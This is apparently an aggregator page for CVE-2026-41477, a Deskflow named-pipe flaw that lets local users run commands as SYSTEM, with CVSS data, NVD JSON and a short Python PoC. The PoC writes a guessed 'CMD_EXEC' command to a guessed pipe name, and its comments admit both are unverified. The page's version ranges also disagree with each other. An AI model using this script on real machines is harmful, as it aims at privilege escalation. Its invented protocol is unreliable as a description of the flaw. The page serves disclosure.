Security Vulnerability Report
中文
CVE-2026-41477 CVSS 7.8 HIGH

CVE-2026-41477

Published: 2026-04-24 20:16:28
Last Modified: 2026-04-28 15:46:28
Source: [email protected]

Description

Deskflow is a keyboard and mouse sharing app. In 1.20.0, 1.26.0.134, and earlier, Deskflow daemon runs as SYSTEM and exposes an IPC named pipe with WorldAccessOption enabled. The daemon processes privileged commands without authentication, allowing any local unprivileged user to execute arbitrary commands as SYSTEM. Affects both stable v1.20.0 + and Continuous v1.26.0.134 prerelease.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:deskflow:deskflow:*:*:*:*:*:*:*:* - VULNERABLE
Deskflow <= 1.20.0
Deskflow <= 1.26.0.134

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import win32file import win32pipe import win32con # This PoC demonstrates how to connect to the vulnerable named pipe # and send a command. The specific pipe name and command format # depend on the Deskflow implementation details. PIPE_NAME = r'\\.\pipe\Deskflow' # Example pipe name, verify actual name def exploit(): try: # Attempt to connect to the named pipe handle = win32file.CreateFile( PIPE_NAME, win32file.GENERIC_READ | win32file.GENERIC_WRITE, 0, None, win32con.OPEN_EXISTING, 0, None ) if handle == win32file.INVALID_HANDLE_VALUE: print("[!] Failed to connect to the pipe.") return print("[+] Connected to the pipe successfully.") # Malicious command to execute as SYSTEM (example) # Actual command protocol needs reverse engineering payload = b"CMD_EXEC: whoami > C:\temp\pwn.txt" # Write payload to the pipe win32file.WriteFile(handle, payload) print("[+] Payload sent. Check for SYSTEM execution.") win32file.CloseHandle(handle) except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41477", "sourceIdentifier": "[email protected]", "published": "2026-04-24T20:16:28.340", "lastModified": "2026-04-28T15:46:28.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deskflow is a keyboard and mouse sharing app. In 1.20.0, 1.26.0.134, and earlier, Deskflow daemon runs as SYSTEM and exposes an IPC named pipe with WorldAccessOption enabled. The daemon processes privileged commands without authentication, allowing any local unprivileged user to execute arbitrary commands as SYSTEM. Affects both stable v1.20.0 + and Continuous v1.26.0.134 prerelease."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:deskflow:deskflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.20.0", "versionEndIncluding": "1.26.0.161", "matchCriteriaId": "AA59EEDC-F617-4625-8FA1-984C5E462436"}]}]}], "references": [{"url": "https://github.com/deskflow/deskflow/security/advisories/GHSA-6rx5-g478-775c", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/deskflow/deskflow/security/advisories/GHSA-6rx5-g478-775c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.